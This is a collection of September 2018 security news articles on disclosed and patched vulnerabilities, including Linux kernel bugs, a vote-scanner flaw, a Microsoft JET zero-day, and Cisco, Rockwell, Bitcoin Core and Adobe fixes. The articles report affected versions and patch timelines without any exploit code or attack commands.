Horn reported his findings to Linux kernel developers on September 12 and a patch was created two days later. “This is exceptionally fast, compared to the fix times of other software vendors,” the expert said.

The issue was disclosed on the oss-security mailing list on September 18, and the patch was rolled out the next day, when it was backported to upstream stable kernel versions 4.18.9, 4.14.71, 4.9.128 and 4.4.157.

The researcher noted that once the patch lands in the upstream kernel, which in this case was September 14, the bug becomes public knowledge – the security impact is obfuscated, but it’s not difficult for experts to figure out. At this point, malicious actors can already create an exploit for it, but Linux distributions need to backport the fix before it can be provided to users.

Horn pointed out, however, that the developers of Linux distributions don’t publish kernel updates very often, leaving users exposed to potential attacks.

“For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27. Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users - especially if the security impact is not announced publicly,” Horn explained.

The researcher singled out Debian and Ubuntu developers for not making a patch available to users more than a week after public disclosure of the vulnerability.

“The fix timeline shows that the kernel's approach to handling severe security bugs is very efficient at quickly landing fixes in the git master tree, but leaves a window of exposure between the time an upstream fix is published and the time the fix actually becomes available to users - and this time window is sufficiently large that a kernel exploit could be written by an attacker in the meantime,” Horn said.


Researchers: 11-Year-Old Flaw in Vote Scanner Still Unfixed
28.9.2018 securityweek
Vulnerebility

An uncorrected security flaw in a vote-counting machine used in 23 U.S states leaves it vulnerable to hacking 11 years after the manufacturer was alerted to it, security researchers say.

The M650 high-speed ballot scanner is made by Election Systems & Software, the nation's leading elections equipment vendor. The vulnerability was the most serious noted in voting equipment in a report Thursday that summarized the findings of security researchers at the September DefCon hacking convention's "Voting Village" in Las Vegas, which highlighted a number of vulnerabilities in election equipment.

"This counts the ballots for an entire county," said Jake Braun, one of the organizers and a University of Chicago cybersecurity expert said of the M650. If successfully hacked by someone intent on changing vote totals in a swing-state county, "it could flip the Electoral College," he said.

"One infected disk can take over the entire election system," said Harri Hursti, another "Voting Village" organizer and the researcher who initially detected the flaw in a 2007 report done for the Ohio secretary of state .

Braun said it is both surprising and a reflection of the state of the nation's voting equipment industry that ES&S has continued to support and service the M650 — and that many election officials have not retired it.

Cybersecurity experts have long complained that the nation's antiquated elections infrastructure is highly vulnerable to tampering — now a critical concern given documented Russian attempts to influence the 2016 presidential election. Those activities included probes of elections systems in at least 21 states, a hack into the Illinois voter-registration database and attempts to hack a Florida maker of electronic poll books.

A National Academies of Sciences report in September urged essential reforms by 2020 including sustained federal funding, since elections are administered by the states and security is typically shortchanged. Other recommendations included retiring electronic machines that lack a "human-readable" paper trail and making reliable post-election audits mandatory. The GOP leadership in Congress has recently stymied efforts to pass election-reform legislation.

The M650 scans paper ballots — it can process more than 300 per minute. ES&S said in a statement Thursday that it discontinued manufacture of the machines in 2008 but that 270 are in active use today. It said the machine has "a solid, proven track record when used in a real election environment with proper physical controls," although it has been replaced by more secure models.

"We believe that the security protections on the M650 are strong enough to make it extraordinarily difficult to hack in a real-world environment and, therefore, safe and secure to use in an election," the company said.

Proper physical controls would prevent access to the machines by unauthorized outsiders who might introduce a vote count-altering virus. Hursti, however, said he's spoken to elections officials who program the M650 program with removable Zip drive disks that could transmit malware. It's also possible to infect the machine via a built-in network port.

ES&S did not respond when asked by the Associated Press why it had not corrected the Zip drive vulnerability despite knowing about it for more than a decade. It also did not say whether it continues to sell the M650, which was listed on its website product offerings as recently as last month.

The DefCon village, now in its second year, was attended by more than 100 elections officials from across the nation. Senior officials from the National Security Agency and the Department of Homeland Security endorsed its organizers' assertion that the best way to secure elections equipment is to let friendly hackers attack it.

ES&S disagreed. It complained in an Aug. 24 letter to a group of U.S. senators that "exposing technology in these kinds of environments makes hacking elections easier, not harder, and we suspect that our adversaries are paying very close attention."

Organizers of the Voting Village obtained more than 30 pieces of voting equipment and other machines for security testing, but were significantly limited in what they could test, mostly because vendors refused to make proprietary equipment available. Researchers did not test any election management or voter registration systems.


CVE-2018-1718 -Google Project Zero reports a new Linux Kernel flaw
28.9.2018 securityaffairs
Vulnerebility

Google Project Zero disclosed details for a high severity Linux kernel a use-after-free vulnerability tracked as CVE-2018-1718.
The vulnerability is a use-after-free tracked as CVE-2018-17182, it was discovered by Google Project Zero’s Jann Horn. The vulnerability was introduced in August 2014 with the release of version 3.16 of the Linux kernel.

The issue could be exploited by an attacker trigger a DoS condition or to execute arbitrary code with root privileges on the vulnerable system.

The expert reported the flaws to Linux kernel development team on September 12 and they fixed it in just two days later.

Horn also published the PoC exploit for the vulnerability, the researcher explained that exploitation of the issue is time-consuming because the process triggering the vulnerability needs to run for long enough to cause the overflow for a reference counter.

“This blogpost describes a way to exploit a Linux kernel bug (CVE-2018-17182) that exists since kernel version 3.16.” reads the security advisory published by Project Zero.

“Fixes for the issue are in the upstream stable releases 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58.”

The researcher warns of the possibility that threat actors can already develop an exploit for the vulnerability, another element of concern is that the developers of Linux distributions don’t publish kernel updates very frequently, a circumstance that expose users to attacks.

“However, Linux distributions often don’t publish distribution kernel updates very frequently. For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27.” Horn explained.

“Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users – especially if the security impact is not announced publicly.”

This exploit demonstrates the importance of a secure kernel configuration, some specific settings like kernel.dmesg_restrict sysctl provides “a reasonable tradeoff when enabled”.


Linux Kernel Vulnerability Affects Red Hat, CentOS, Debian
27.9.2018 securityweek
Vulnerebility

Qualys has disclosed the details of an integer overflow vulnerability in the Linux kernel that can be exploited by a local attacker for privilege escalation. The flaw, dubbed “Mutagen Astronomy,” affects certain versions of the Red Hat, CentOS and Debian distributions.

Tracked as CVE-2018-14634, the flaw exists in the kernel’s create_elf_tables() function. The security hole can be exploited using a SUID binary to escalate privileges to root, but it only works on 64-bit systems.

The vulnerability affects versions of the kernel released between July 19, 2007, and July 7, 2017. While many Linux distributions have backported the commit that addresses the bug, the fix hasn’t been implemented in Red Hat Enterprise Linux, CentOS (which is based on Red Hat), and Debian 8 Jessie.

According to an advisory published by Qualys on Tuesday, the vulnerability was reported to Red Hat on August 31 and to Linux kernel developers on September 18. The cloud-based security and compliance solutions provider has made available both technical details and proof-of-concept (PoC) exploits.

Red Hat, which assigned the flaw an impact rating of “important” and a CVSS score of 7.8 (high severity), has started releasing updates that should address the issue.

“This issue does not affect 32-bit systems as they do not have a large enough address space to exploit this flaw,” Red Hat explained. “Systems with less than 32GB of memory are unlikely to be affected by this issue due to memory demands during exploitation.”

“This issue affects the version of the kernel packages as shipped with Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2. Future kernel updates for Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2 will address this issue,” Red Hat said.

Both CentOS and Red Hat developers have provided mitigations for the vulnerability.


Mutagen Astronomy Linux Kernel vulnerability affects Red Hat, CentOS, and Debian distros
27.9.2018 securityaffairs
Vulnerebility

A new integer overflow vulnerability found in Linux Kernel. Dubbed Mutagen Astronomy, it affects Red Hat, CentOS, and Debian Distributions.
Security researchers have discovered a new integer overflow vulnerability in Linux Kernel, dubbed Mutagen Astronomy, that affects Red Hat, CentOS, and Debian Distributions.

The vulnerability could be exploited by an unprivileged user to gain superuser access to the targeted system.

The flaw was discovered by researchers at security firm Qualys that shared technical details of the Mutagen Astronomy vulnerabilities, including proof-of-concept (PoC) exploits (Exploit 1, Exploit 2).

The flaw tracked as CVE-2018-14634 affects the kernel versions released between July 2007 and July 2017, Linux Kernel versions 2.6.x, 3.10.x and 4.14.x, are vulnerable to the Mutagen Astronomy flaw.

The versions of Linux kernel as shipped with Red Hat Enterprise Linux 5 are not affected by the issue.

The Mutagen Astronomy vulnerability exists in the create_elf_tables() function in the Linux kernel that is used to manage memory tables.

“We discovered an integer overflow in the Linux kernel’s create_elf_tables() function: on a 64-bit system, a local attacker can exploit this vulnerability via a SUID-root binary and obtain full root privileges.” reads the security advisory published by Qualys.

“Only kernels with commit b6a2fea39318 (“mm: variable length argument support”, from July 19, 2007) but without commit da029c11e6b1 (“exec: Limit arg stack to at most 75% of _STK_LIM”, from July 7, 2017) are exploitable. Most Linux distributions backported commit da029c11e6b1 to their long-term-supported kernels, but Red Hat Enterprise Linux and CentOS (and Debian 8, the current “oldstable” version) have not, and are therefore vulnerable and exploitable.”

Like other local privilege escalation issue, the exploitation of this flaw requests the access to the targeted system and the execution of exploit code that trigger a buffer overflow.

Once the attacker has triggered a buffer overflow, it can execute arbitrary code on the affected machine and take over it.

“An integer overflow flaw was found in the Linux kernel’s create_elf_tables() function. An unprivileged local user with access to SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system.” reads the security advisory published by Red Hat.

“This issue does not affect 32-bit systems as they do not have a large enough address space to exploit this flaw. Systems with less than 32GB of memory are very unlikely to be affected by this issue due to memory demands during exploitation.

This issue does not affect the versions of Linux kernel as shipped with Red Hat Enterprise Linux 5. This issue affects the version of the kernel packages as shipped with Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2. Future kernel updates for Red Hat Enterprise Linux 6, 7 and Red Hat Enterprise MRG 2 will address this issue.”

Mutagen Astronomy Linux Kernel

At the time of writing, Red Hat Enterprise Linux, CentOS, and Debian 8 Jessie have not yet addressed the flaw.

Below the timeline for the flaw:

2018-08-31: Contacted secalert@redhat.com.
2018-09-18: Contacted linux-distros@vs.openwall.org and security@kernel.org.
2018-09-25: Coordinated Release Date (Time: 5:00 PM UTC).


Third-Party Patch Available for Microsoft JET Database Zero-Day
26.9.2018 securityweek
Vulnerebility

An unofficial patch is already available for the unpatched Microsoft JET Database Engine vulnerability that Trend Micro's Zero Day Initiative (ZDI) made public last week.

The security flaw, an out-of-bounds (OOB) write in the JET Database Engine that could be exploited for remote code execution, was reported to the vendor in early May. ZDI disclosed the issue publicly as 120 days had passed after they notified the vendor, although a patch hadn’t been released.

The bug resides in the manner in which indexes are managed in JET. Crafted data in a database file can trigger a write past the end of an allocated buffer and an attacker could exploit this to execute code under the context of the current process. Exploitation, however, requires user interaction.

Despite not being considered critical, attackers could use social engineering to trick users into opening malicious files capable of triggering the exploit.

Now, 0patch, a community project focused on resolving software vulnerabilities by delivering tiny fixes to users worldwide, says they were able to devise a patch for the bug less than a day after ZDI went public with their findings.

In a blog post detailing the fix, ACROS Security CEO Mitja Kolsek explains that, with JET only working on 32-bit systems, the proof-of-concept (PoC) code provided by ZDI would cause an error message on 64-bit systems, unless launched with wscript.exe.

Because it attempts to write past the allocated memory block, the PoC causes a crash in wscript.exe, and this is where the security researchers started from when building their patch.

Kolsek notes that a micro-patch was ready for Windows 7 only 7 hours after ZDI had published their PoC and that the fix would work on all platform iterations sharing the exact same version of msrd3x40.dll as Windows 7.

Windows 10, however, has a slightly different msrd3x40.dll, and the security researchers had to make a small tweak to the initial micro-patch to address the issue in this platform iteration as well. According to Kolsek, they used the exact same source code, just a different file hash.

“These two micropatches for a published 0day were then issued less than 24 hours after the 0day was dropped, and distributed to our users' computers within 60 minutes, where they were automatically applied to any running process with vulnerable msrd3x40.dll loaded. Which nicely demonstrates the speed, simplicity and user-friendliness of micropatching when it comes to fixing vulnerabilities,” Kolsek notes.

The patches are free for everyone. Users interested in getting them only need to install and register the 0patch Agent. Even with these micro-patches, however, users are still advised to install Microsoft’s official fixes once they arrive.


oPatch community released micro patches for Microsoft JET Database Zero-Day
26.9.2018 securityaffairs
Vulnerebility

0patch community released an unofficial patch for the Microsoft JET Database Engine zero-day vulnerability disclosed by Trend Micro’s Zero Day Initiative
Experts from 0patch, a community of experts that aims at addressing software flaws, released an unofficial patch for the Microsoft JET Database Engine zero-day vulnerability that Trend Micro’s Zero Day Initiative (ZDI) disclosed last week.

The Microsoft JET Database Engine flaw is an out-of-bounds (OOB) write in the JET Database Engine that could be exploited by a remote attacker to execute arbitrary code on the vulnerable systems.

The zero-day vulnerability has received CVSS score of 6.8 and resides in the management of indexes in JET. An attacker can use specially crafted data in a database file to trigger a write past the end of an allocated buffer.

According to the ZDI’s disclosure policy, details on the vulnerability could be released 120 days after the vendor was notified on the issue, even if the flaw was still unpatched.

ZDI also published the proof-of-concept (PoC) exploit code for the vulnerability.

The 0patch community is known to develop tiny patches, usually less than 30 bytes in size, it released a fix within 24 hours after the public disclosure of the issue.

0patch experts were able to devise a security patch for the zero-day in less than 24 hours.

0patch
@0patch
· Sep 20, 2018
7 hours after @thezdi has published details on this unpatched remotely exploitable vulnerability in Jet Database Engine, we have a micropatch candidate on Windows 7. More on this vulnerability and our micropatch soon. https://twitter.com/thezdi/status/1042797177590964225 …

0patch
@0patch
We're happy to announce general availability of two free micropatches for the Jet Engine Out-Of-Bounds Write vulnerability disclosed yesterday by @thezdi. These micropatches apply to fully updated 32bit and 64bit:

- Windows 10
- Windows 8.1
- Windows 7
- Windows Server 2008-2016 pic.twitter.com/Du1cTFafiM

3:50 PM - Sep 21, 2018
View image on Twitter
13
See 0patch's other Tweets
Twitter Ads info and privacy
Experts from 0patch highlighted that the PoC code published by ZDI only works on 32-bit systems, instead, it would cause an error message on 64-bit systems, unless launched with wscript.exe.

The conditions that trigger the problem represent the starting point, the closest observable point of failure, for the analysis of the experts.

“As usually, we started our analysis from the closest observable point of failure and worked backward to the vulnerable code. Ideally, the “closest observable point of failure” is a process crash, and in this case, ZDI’s PoC indeed causes a crash in wscript.exe due to an attempt to write past the allocated memory block. So their PoC was perfect for us.” reads the analysis of the 0patch experts.

“(Not surprisingly, it’s easier for us to work with a crash case than a full blown calc-popping exploit.) Here’s how the crash looks like in WinDbg, with Page Heap enabled and invalid memory access in function TblPage::CreateIndexes:”

0patch released the micro-patch for Windows 7 just 7 hours after ZDI shared the PoC for the Windows Microsoft JET Database Engine zero-day.

Then the experts attempted to port the patch to other supported Windows versions, they noticed that almost all of them have the exact same version of msrd3x40.dll, a circumstance that suggested them that the same micropatch would apply to all these systems.

The experts pointed out that there is only one Windows version that leverages a different msrd3x40.dll, it was Windows 10.

“The only Windows version with a different msrd3x40.dll was Windows 10: peculiarly, both DLLs had the same version and exactly the same size, but plenty of small differences between the two (including the link timestamp). The code was exactly the same and in the same place though (probably just a re-build), so we could actually use the exact same source code for the micropatch, just a different file hash.” continues the analysis.

The two micro patches for the Windows 0day were issued in less than 24 hours after the public disclosure of the technical details of the flaw.

“These two micropatches for a published 0day were then issued less than 24 hours after the 0day was dropped, and distributed to our users’ computers within 60 minutes, where they were automatically applied to any running process with vulnerable msrd3x40.dll loaded. Which nicely demonstrates the speed, simplicity and user-friendliness of micropatching when it comes to fixing vulnerabilities.” continues the analysis.

Users that want to get the micro patches just need to install and register the 0patch Agent, anyway it is strongly recommended to install Microsoft’s official updates when Microsoft will issue them.


Bitcoin Core Team fixes a critical DDoS flaw in wallet software
25.9.2018 securityaffairs
Vulnerebility

Bitcoin Core Software fixed a critical DDoS attack vulnerability in the Bitcoin Core wallet software tracked as CVE-2018-17144.
The Bitcoin Core team urges miners to update client software with the latest Bitcoin Core 0.16.3 version as soon as possible.

“A denial-of-service vulnerability (CVE-2018-17144) exploitable by miners has been discovered in Bitcoin Core versions 0.14.0 up to 0.16.2. It is recommended to upgrade any of the vulnerable versions to 0.16.3 as soon as possible,” states the security advisory.

The flaw affected the Bitcoin Core wallet software and could have been exploited by attackers to crash Bitcoin Core nodes running software versions 0.14.0 to 0.16.2.

The CVE-2018-17144 vulnerability is critical because by coordinating an attack through the Bitcoin miners it was possible to bring down the entire blockchain either by overflooding the block with duplicate transactions, resulting in blockage of transaction confirmation from other people or by flooding the nodes of the Bitcoin P2P network and saturating the bandwidth.

The bug seems to have been introduced in March 2017, but no one apparently has exploited the flaw in live attacks.

The flaw potentially affects all recent versions of the BTC system, but anyway, experts pointed out that a coordinated Distributed Denial of Service (DDoS) attack against Bitcoin blockchain is very expensive.

It has been estimated that a successful DDoS attack on the BTC network would cost miners 12.5 bitcoins ($80,000).

According to the change log of the latest version, the Bitcoin Core team also patched minor issues related to RPC and other APIs, to invalid error flags, to the consensus and documentation.

“If you are running an older version, shut it down. Wait until it has completely shut down (which might take a few minutes for older versions), then run the installer (on Windows) or just copy over `/Applications/Bitcoin-Qt` (on Mac) or `bitcoind`/`bitcoin-qt` (on Linux).” continues the note.

“The first time you run version 0.15.0 or newer, your chainstate database will be converted to a new format, which will take anywhere from a few minutes to half an hour, depending on the speed of your machine.”


Cisco Removes Default Password From Video Surveillance Manager
24.9.2018 securityweek
Vulnerebility

A critical vulnerability recently patched in the Cisco Video Surveillance Manager (VSM) could allow an unauthenticated attacker to log in as root.

The security flaw, Cisco revealed on Friday, impacts only the VSM software running on certain Connected Safety and Security Unified Computing System (UCS) platforms. The issue, the company says, resides in the presence of default, static credentials for the root account.

The credentials for the account are undocumented and only impact certain systems, the company underlines. An attacker exploiting the vulnerability could log in to the affected systems and execute arbitrary commands as the root user.

The bug, Cisco reveals, impacts VSM Software releases 7.10, 7.11, and 7.11.1. The issue, however, only manifests if the software was preinstalled by Cisco and only impacts the CPS-UCSM4-1RU-K9, CPS-UCSM4-2RU-K9, KIN-UCSM5-1RU-K9, and KIN-UCSM5-2RU-K9 Connected Safety and Security UCS platforms.

“This vulnerability exists because the root account of the affected software was not disabled before Cisco installed the software on the vulnerable platforms, and default, static user credentials exist for the account. The user credentials are not documented publicly,” Cisco notes in an advisory.

VSM Software Releases 7.9 and earlier are not impacted by the bug. VSM releases 7.10, 7.11, and 7.11.1 running on CPS-UCSM4-1RU-K9 and CPS-UCSM4-1RU-K9 platforms aren’t impacted either if they were installed as upgrades to a pre-installed release 7.9. VSM on the VMware ESXi platform isn’t impacted either.

There are no workarounds for this vulnerability and affected users are advised to upgrade to VSM Release 7.12 to patch it. Those who do not want to upgrade should contact the Cisco TAC for further assistance.

“The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability,” Cisco also notes.


Critical flaw affects Cisco Video Surveillance Manager
September 24, 2018 By Pierluigi Paganini
Vulnerebility

Cisco has patched a critical vulnerability in the Cisco Video Surveillance Manager (VSM) could be exploited by an unauthenticated remote attacker to gain root access.
Cisco has fixed a critical vulnerability in the Cisco Video Surveillance Manager software running on some Connected Safety and Security Unified Computing System (UCS) platforms.

The flaw could give an unauthenticated, remote attacker the ability to execute arbitrary commands as root on targeted systems.

The software running on certain systems includes default, static credentials for the root account that could allow attackers to gain root access.

The credentials for the account are undocumented.

“The vulnerability is due to the presence of undocumented, default, static user credentials for the root account of the affected software on certain systems,” reads the advisory published by Cisco.

“An attacker could exploit this vulnerability by using the account to log in to an affected system.”

The vulnerability impacts Cisco Video Surveillance Manager (VSM) Software releases 7.10, 7.11, and 7.11.1. The flaw only affects systems where the software was preinstalled by Cisco and only impacts the CPS-UCSM4-1RU-K9, CPS-UCSM4-2RU-K9, KIN-UCSM5-1RU-K9, and KIN-UCSM5-2RU-K9 Connected Safety and Security UCS platforms.

Critical flaw affects Cisco Video Surveillance Manager

“This vulnerability exists because the root account of the affected software was not disabled before Cisco installed the software on the vulnerable platforms, and default, static user credentials exist for the account. The user credentials are not documented publicly,” continues the Cisco advisory.

At the time, there are no workarounds for this vulnerability, users urge to upgrade to VSM Release 7.12 to address the flaw.

Cisco confirmed that it is not aware of any attack leveraging the issue.

“The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability,” Cisco concludes.

Recently Cisco issued another warning for a critical static credential flaw in its IOS XE software.


ZDI Shares Details of Microsoft JET Database Zero-Day
24.9.2018 securityweek
Vulnerebility

Trend Micro's Zero Day Initiative (ZDI) on Thursday made public details on a vulnerability impacting the Microsoft JET Database Engine, although a patch isn’t yet available for it.

The zero-day vulnerability was reported to Microsoft in early May 2018 and a fix was expected to be included in the company’s September set of security updates, but it did not make the cut.

As per the ZDI’s disclosure policy, information on the bug was released publicly 120 days after the vendor was notified on its existence, despite the lack of a patch.

The issue, ZDI explains, is an out-of-bounds (OOB) write in the JET Database Engine that could be exploited for remote code execution.

Discovered by Lucas Leong of Trend Micro Security Research, the flaw resides in the management of indexes in JET and crafted data in a database file can trigger a write past the end of an allocated buffer.

Although an attacker could leverage the vulnerability to execute code under the context of the current process, exploitation requires user interaction, ZDI’s Simon Zuckerbraun explains in a blog post. Specifically, it requires for the victim to open a malicious file that would trigger the bug.

“Microsoft patched two other issues in JET in the September Patch Tuesday updates. While the patched bugs are listed as buffer overflows, this additional bug is actually an out-of-bounds write, which can be triggered by opening a Jet data source via OLEDB,” Zuckerbraun notes.

OLEDB (or OLE-DB) stands for Object Linking and Embedding, Database, an API from Microsoft that allows accessing data from a variety of sources in a uniform manner.

An attacker looking to trigger the vulnerability would need to trick the user into opening a specially crafted file that contains data stored in the JET database format. The database format is used by various applications and the attacker would be able to execute code at the level of the current process.

The vulnerability was confirmed in Windows 7, but ZDI, which also published proof of concept code, believes that all supported Windows version are impacted, including server editions.

“Microsoft continues to work on a patch for this vulnerability, and we hope to see it in the regularly scheduled October patch release. In the absence of a patch, the only salient mitigation strategy is to exercise caution and not open files from untrusted sources,” Zuckerbraun concludes.

The zero-day flaw has a CVSS score of 6.8.


Expert disclosed an unpatched zero-day flaw in all supported versions of Microsoft Windows
23.9.2018 securityaffairs
Vulnerebility

A security researcher from Trend Micro Security Research team disclosed an unpatched zero-day vulnerability in all supported versions of Microsoft Windows.
The researcher Lucas Leong of the Trend Micro Security Research team publicly disclosed an unpatched zero-day vulnerability in all supported versions of Microsoft Windows.

The flaw is an out-of-bounds (OOB) write in the JET Database Engine that could be exploited by a remote attacker to execute arbitrary code on the vulnerable systems.

The zero-day vulnerability has received CVSS score of 6.8 and resides in the management of indexes in JET. An attacker can use specially crafted data in a database file to trigger a write past the end of an allocated buffer.

Experts highlighted that the exploitation of the flaw requires user interaction, the attackers have to trick victims into opening a malicious file that would trigger the bug.

The specially crafted file has to contain data stored in the JET database format.

The expert disclosed the flaw through the Trend Micro’s Zero Day Initiative (ZDI) on Thursday, the issue affects the Microsoft JET Database Engine.

Lucas Leong reported the flaw to Microsoft in early May 2018, he expected the flaw would have been fixed with the September 2018 Patch Tuesday set of security updates, but Microsoft did not fix it.

“Today, we are releasing additional information regarding a bug report that has exceeded the 120-day disclosure timeline” reads the blog post published by ZDI.

“An out-of-bounds (OOB) write in the Microsoft JET Database Engine that could allow remote code execution was initially reported to Microsoft on May 8, 2018. An attacker could leverage this vulnerability to execute code under the context of the current process, however it does require user interaction since the target would need to open a malicious file. As of today, this bug remains unpatched.”

According to the ZDI’s disclosure policy, details on the vulnerability could be released 120 days after the vendor was notified on the issue, even if the flaw was still unpatched.

ZDI also published the proof-of-concept (PoC) exploit code for the vulnerability.

Windows zero-day

Microsoft confirmed the existence of the flaw in Windows 7, but experts at ZDI believes the issue affects all supported Windows version.

“Our investigation has confirmed this vulnerability exists in Windows 7, but we believe that all supported Windows version are impacted by this bug, including server editions. You can view our advisory here.” ZDI concludes.

“Microsoft continues to work on a patch for this vulnerability, and we hope to see it in the regularly scheduled October patch release. In the absence of a patch, the only salient mitigation strategy is to exercise caution and not open files from untrusted sources.”


Cisco Patches Code Execution in Webex Player
22.9.2018 securityweek
Vulnerebility

Cisco this week addressed vulnerabilities in the Webex Network Recording Player for Advanced Recording Format (ARF) that could allow a remote attacker to execute arbitrary code on a targeted system.

The Webex Meetings Server is a multimedia conferencing solution that can be hosted on a customer’s private cloud and which manages and maintains the Webex Meetings Suite services and Webex Meetings Online hosted multimedia conferencing solutions.

The Meetings services can record meetings, with the recordings stored online or downloadable in ARF format. The meetings can also be recorded directly on a local computer, in WRF format.

The Network Recording Player can be installed either automatically when a user accesses a recording file hosted on a Webex Meetings Suite site or manually from the Webex site.

Improper validation of Webex recording files, however, was found to lead to vulnerabilities that an unauthenticated, remote attacker can exploit.

For exploitation purposes, the attacker would need to send a link or email attachment containing a malicious file to the victim and trick them into opening the file in the Cisco Webex Player.

The bugs, Cisco explains in an advisory, impact ARF recording players available from Meetings Suite (WBS32) - Player versions prior to WBS32.15.10; Meetings Suite (WBS33) - Player versions prior to WBS33.3; Webex Meetings Online - Player versions prior to 1.3.37; and Webex Meetings Server - Player versions prior to 3.0MR2.

The issues are tracked as CVE-2018-15414, CVE-2018-15421, and CVE-2018-15422. The Windows, OS X, and Linux versions of the Webex Network Recording Players are impacted by at least one of the flaws, Cisco reveals.

The Network Recording Player updates that resolve the vulnerabilities include Meetings Suite (WBS32) - Player versions WBS32.15.10 and later and Meetings Suite (WBS33) - Player versions WBS33.3 and later; Meetings Online - Player versions 1.3.37 and later; and Meetings Server - Player versions 3.0MR2 and later.

According to Cisco, there are no known workarounds for these vulnerabilities. However, users can remove the affected Network Recording Player and Webex Player by following the uninstall procedure for their respective operating systems.

“The Cisco Webex Network Recording Player (for .arf files) will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a Cisco Webex Meetings site that contains the versions previously specified,” Cisco explains.


Rockwell Automation Patches Severe Flaws in Communications Software
22.9.2018 securityweek
Vulnerebility

Rockwell Automation has patched several critical and high severity vulnerabilities in its RSLinx Classic communications software.

RSLinx Classic is a widely used piece of software that allows organizations to connect Logix5000 programmable automation controllers to various Rockwell applications, including for data acquisition, programming, HMI interaction, and configuration apps. The product is used worldwide, mainly in the energy, critical manufacturing, and water and wastewater systems sectors.

According to advisories published recently by ICS-CERT and Rockwell Automation itself, researchers from Tenable and Nozomi discovered that RSLinx Classic is affected by three vulnerabilities that can allow malicious actors to launch denial-of-service (DoS) attacks, and possibly even execute arbitrary code.

The most serious of the flaws is CVE-2018-14829, a stack-based buffer overflow that has been assigned a CVSS score of 10. A remote attacker can cause the application to crash by sending specially crafted CIP packets on port 44818. Triggering the buffer overflow can also lead to remote code execution, Rockwell and ICS-CERT warned.

Another severe vulnerability is CVE-2018-14827, which has a CVSS score of 8.6 and allows a remote and unauthenticated attacker to crash the application by sending specially crafted Ethernet/IP packets to the aforementioned port. Rockwell noted that the software must be restarted by the user following a successful exploit.

The last vulnerability, also classified as high severity, with a CVSS score of 7.5, is a heap-based buffer overflow tracked as CVE-2018-14821. This security bug also allows a remote and unauthenticated attacker to crash the software using malicious CIP packets.

The flaws affect RSLinx Classic 4.00.01 and prior. Patches have been released by the vendor for each impacted version.

Users can also protect themselves against potential attacks by disabling port 44818, which is only needed in certain scenarios.

These are not the only serious vulnerabilities patched recently by Rockwell Automation in RSLinx Classic. A few months ago, the company and ICS-CERT informed users of a high severity privilege escalation issue that also affected the FactoryTalk Linx Gateway product.


Cisco fixes Remote Code Execution flaws in Webex Network Recording Player
21.9.2018 securityaffairs
Vulnerebility

Cisco released security patches to fix RCE flaws in the Webex Network Recording Player for Advanced Recording Format (ARF).
Cisco released security patches to address vulnerabilities in the Webex Network Recording Player for Advanced Recording Format (ARF) (CVE-2018-15414, CVE-2018-15421, and CVE-2018-15422) that could be exploited by an unauthenticated, remote attacker to execute arbitrary code on a vulnerable system

The Webex Meetings Server is a collaboration and communications solution that can be deployed on a private cloud and which manages the Webex Meetings Suite services and Webex Meetings Online hosted multimedia conferencing solutions.

The Meetings services allow customers to record meetings and store them online or in an ARF format or on a local computer, in WRF format.

The relative player Network Recording Player can be installed either automatically when a user accesses a recording file hosted on a Webex Meetings Suite site or manually by downloading it from the Webex site.

The lack of proper validation for the Webex recording files is the root cause of the vulnerabilities that could allow unauthenticated, remote attacker to execute arbitrary code on the target machine.

“Multiple vulnerabilities in the Cisco Webex Network Recording Player for Advanced Recording Format (ARF) could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system.” reads the security advisory published by Cisco.

“The vulnerabilities are due to improper validation of Webex recording files. An attacker could exploit these vulnerabilities by sending a user a link or email attachment containing a malicious file and persuading the user to open the file in the Cisco Webex Player. A successful exploit could allow the attacker to execute arbitrary code on an affected system.”


An attacker could exploit the flaw by tricking victims into opening a malicious file in the Cisco Webex Player, the file could be sent via email as an attachment or through a link in the content referencing it.

The vulnerabilities affect the following ARF recording players:

Cisco Webex Meetings Suite (WBS32) – Webex Network Recording Player versions prior to WBS32.15.10
Cisco Webex Meetings Suite (WBS33) – Webex Network Recording Player versions prior to WBS33.3
Cisco Webex Meetings Online – Webex Network Recording Player versions prior to 1.3.37
Cisco Webex Meetings Server – Webex Network Recording Player versions prior to 3.0MR2
Each version of the Webex Network Recording Players for Windows, OS X, and Linux is affected by at least one of the issues.

The following Network Recording Player updates address the vulnerabilities:

Meetings Suite (WBS32) – Player versions WBS32.15.10 and later and Meetings Suite (WBS33) – Player versions WBS33.3 and later;
Meetings Online – Player versions 1.3.37 and later; and Meetings Server – Player versions 3.0MR2 and later.
Cisco warns that there are no known workarounds for these issues.

“The Cisco Webex Network Recording Player (for .arf files) will be automatically upgraded to the latest, non-vulnerable version when users access a recording file that is hosted on a Cisco Webex Meetings site that contains the versions previously specified,” concludes the Cisco advisory.


Adobe Patches Code Execution, Other Flaws in Acrobat and Reader
20.9.2018 securityweek
Vulnerebility

Updates released on Wednesday by Adobe for the Windows and macOS versions of Acrobat and Reader address a total of 7 vulnerabilities, including a critical flaw that can allow arbitrary code execution.

The security holes affect Acrobat DC and Acrobat Reader DC (continuous track) 2018.011.20058 and earlier versions; Acrobat 2017 and Acrobat Reader 2017 (classic 2017 track) 2017.011.30099 and earlier versions; and Acrobat DC and Acrobat Reader DC (classic 2015 track) 2015.006.30448 and earlier versions.

The most serious of the flaws, tracked as CVE-2018-12848 and classified as “critical,” is an out-of-bounds write issue that allows arbitrary code execution. This was one of the four vulnerabilities reported to Adobe by Omri Herscovici, research team leader at Check Point Software Technologies.

